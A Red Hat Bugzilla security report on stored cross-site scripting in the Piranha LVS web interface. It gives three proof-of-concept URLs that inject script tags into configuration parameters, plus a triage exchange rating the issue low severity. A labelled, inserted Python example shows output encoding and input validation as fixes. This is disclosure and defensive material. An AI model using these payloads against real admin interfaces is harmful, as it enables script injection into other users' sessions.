Bug 1051551 - piranha: multiple stored XSS issues
Summary: piranha: multiple stored XSS issues
Keywords:
Status: CLOSED WONTFIX
Alias: None
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: Unspecified
OS: Unspecified
Priority: low
Severity: low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 1275699
Blocks: 1062151
 
Reported: 2014-01-10 14:52 UTC by Othman Madjoudj
Modified: 2019-09-29 13:12 UTC
CC List: 5 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2015-10-27 21:55:48 UTC


Attachments
A screenshot of one of the issues (100.47 KB, image/png)
2014-01-10 14:54 UTC, Othman Madjoudj

Description Othman Madjoudj 2014-01-10 14:52:31 UTC
Description of the issue:

It seems that the Piranha web application does not escape its output and/or user input (hostnames/IPs/etc.), which leads to cross-site scripting vulnerabilities; some of them are reflected (low impact) and some are persistent/stored (high impact) in the configuration file '/etc/sysconfig/ha/lvs.cf'.


Tested version: 

piranha-0.8.6-4.el6.x86_64

Examples of the vulnerabilities:

1) stored XSS in hostname parameter (virtual_main.php / virtual_edit_virt.php):
NB: port, address and other parameters are also vulnerable.

PoC:
----
http://server:3636/secure/virtual_edit_virt.php?hostname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&port=80&protocol=tcp&address=0.0.0.0&vip_nmask=Unused&sorry_server=&fwmark=&device=eth0%3A1&reentry=15&timeout=6&quiesce_server=0&load=none&sched=Weighted+least-connections&persistent=&pmask=Unused&selected_host=1&vev_action=ACCEPT

Result:
The injection in the PoC will appear in the following page:
http://server:3636/secure/virtual_main.php

Relevant part of '/etc/sysconfig/ha/lvs.cf':

[...]
virtual <script>alert(1)</script> {
     active = 0
     address = 0.0.0.0 eth0:1
     port = 80
     send = "GET / HTTP/1.0\r\n\r\n"
     expect = "HTTP"
     use_regex = 0
     load_monitor = none
     scheduler = wlc
     protocol = tcp
     timeout = 6
     reentry = 15
     quiesce_server = 0
}

2) stored XSS in redundant parameter (redundancy.php)
NB: other parameters could also be vulnerable.

PoC:
----
http://server:3636/secure/redundancy.php?redundant=0.0.0.0%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&hb_interval=6&dead_after=18&hb_port=539&syncd_iface=&syncd_id=&redundancy_action=ACCEPT

Relevant part of '/etc/sysconfig/ha/lvs.cf':
[...]
backup = 0.0.0.0><script>alert(1)</script>
[...]


3) stored XSS in PriLVSIP (global_settings.php)
NB: other parameters could also be vulnerable.

PoC:
----
http://192.168.1.100:3636/secure/global_settings.php?PriLVSIP=192.168.1.100%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&primary_private=&tcp_timeout=&tcpfin_timeout=&udp_timeout=&global_action=ACCEPT

Relevant part of '/etc/sysconfig/ha/lvs.cf':
[...]
primary = 192.168.1.100"><script>alert(1)</script>
[...]
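The three PoCs above share one pattern: a value submitted to the web UI is written verbatim into lvs.cf and later read back and interpolated into a page without encoding. The following is an added example, not code from the report or from Piranha itself, that models that cycle in Python. It parses an lvs.cf sample constructed from the fragments quoted above, shows the unencoded rendering beside an HTML-encoded one, and adds the write-time check a practitioner would want: primary/backup must be literal IPv4 addresses and a virtual-server name must match a conservative allowlist. The allowlist regex and the table-row rendering are assumptions about how such a fix would look, not Piranha's actual rules or markup.

```python
"""Added example, not code from Piranha or from the bug report: a minimal
model of the lvs.cf write/read cycle the report describes, showing how the
stored payloads reach the browser when output is not encoded, and the two
fixes a practitioner would want: HTML-encode at render time, and reject
hostnames and addresses that are not well formed before they are written."""
import html
import ipaddress
import re

# Constructed sample, modelled on the lvs.cf fragments quoted in the report.
SAMPLE_LVS_CF = """\
primary = 192.168.1.100"><script>alert(1)</script>
backup = 0.0.0.0><script>alert(1)</script>
virtual <script>alert(1)</script> {
     active = 0
     address = 0.0.0.0 eth0:1
     port = 80
     send = "GET / HTTP/1.0\\r\\n\\r\\n"
     expect = "HTTP"
     scheduler = wlc
     protocol = tcp
}
"""

_VIRTUAL_RE = re.compile(r"^virtual\s+(.*?)\s*\{\s*$")
_KV_RE = re.compile(r"^\s*([A-Za-z_]+)\s*=\s*(.*?)\s*$")
# Assumed allowlist for a virtual-server name; Piranha's own rules may differ.
_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,62}$")


def parse_lvs_cf(text):
    """Parse the subset of lvs.cf used here: top-level 'key = value' lines
    and 'virtual <name> { ... }' blocks. Returns (globals, virtuals)."""
    top, virtuals, current = {}, [], None
    for line in text.splitlines():
        m = _VIRTUAL_RE.match(line)
        if m:
            current = {"name": m.group(1), "settings": {}}
            virtuals.append(current)
            continue
        if line.strip() == "}":
            current = None
            continue
        m = _KV_RE.match(line)
        if m:
            target = top if current is None else current["settings"]
            target[m.group(1)] = m.group(2)
    return top, virtuals


def render_row_unsafe(name, address, port):
    """Mirrors the reported behaviour: config values interpolated as-is."""
    return f"<tr><td>{name}</td><td>{address}</td><td>{port}</td></tr>"


def render_row_safe(name, address, port):
    """Fix 1: HTML-encode every value at the point it enters the page."""
    esc = lambda s: html.escape(str(s), quote=True)
    return f"<tr><td>{esc(name)}</td><td>{esc(address)}</td><td>{esc(port)}</td></tr>"


def valid_ipv4(value):
    """Fix 2a: an address field must be a literal IPv4 address."""
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True


def valid_name(value):
    """Fix 2b: a virtual-server name must match the allowlist above."""
    return bool(_NAME_RE.match(value))


def audit(text):
    """Return (field, value) for every primary/backup/virtual-name entry in
    an lvs.cf text that the validators above would have refused to store."""
    top, virtuals = parse_lvs_cf(text)
    bad = [(k, top[k]) for k in ("primary", "backup")
           if k in top and not valid_ipv4(top[k])]
    bad += [("virtual", v["name"]) for v in virtuals if not valid_name(v["name"])]
    return bad


if __name__ == "__main__":
    top, virtuals = parse_lvs_cf(SAMPLE_LVS_CF)
    v = virtuals[0]
    print("unsafe:", render_row_unsafe(v["name"], v["settings"]["address"], v["settings"]["port"]))
    print("safe:  ", render_row_safe(v["name"], v["settings"]["address"], v["settings"]["port"]))
    for field, value in audit(SAMPLE_LVS_CF):
        print(f"would reject {field}: {value!r}")
```

Output encoding alone closes the XSS; the write-time validation is defence in depth, since lvs.cf is also consumed by the LVS daemons and a name or address containing quotes, angle brackets or whitespace has no legitimate meaning there.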

Comment 1 Othman Madjoudj 2014-01-10 14:54:32 UTC
Created attachment 848233 [details]
A screenshot of one of the issues

Comment 2 Tomas Hoger 2014-02-05 20:35:04 UTC
(In reply to Athmane Madjoudj from comment #0)
> which leads to Cross Site Scripting vulnerabilities, some of them are
> reflected (low impact)

Your report does not seem to specify any reflected XSS; only 3 stored XSS are listed.

> and some are persistent/stored (high impact) in the configuration file
> '/etc/sysconfig/ha/lvs.cf'

That's correct, input from lvs.cf is not encoded properly before being added to the output of the web application.  However, I disagree with the high impact rating.  For the application, lvs.cf is really a trusted input.  Also, privileges to edit the file via the web application are administrative privileges, which makes this more of a bug than a real security issue.

Comment 6 Othman Madjoudj 2014-02-05 21:43:20 UTC
(In reply to Tomas Hoger from comment #2)
> (In reply to Athmane Madjoudj from comment #0)
> > which leads to Cross Site Scripting vulnerabilities, some of them are
> > reflected (low impact)
> 
> Your report does not seem to specify any reflected XSS; only 3 stored XSS are
> listed.
> 

I didn't have time to check everything, so I could be wrong about reflected XSS.


> > and some are persistent/stored (high impact) in the configuration file
> > '/etc/sysconfig/ha/lvs.cf'
> 
> That's correct, input from lvs.cf is not encoded properly before being
> added to the output of the web application.  However, I disagree with the
> high impact rating.  For the application, lvs.cf is really a trusted input.
> Also, privileges to edit the file via the web application are administrative
> privileges, which makes this more of a bug than a real security issue.

True

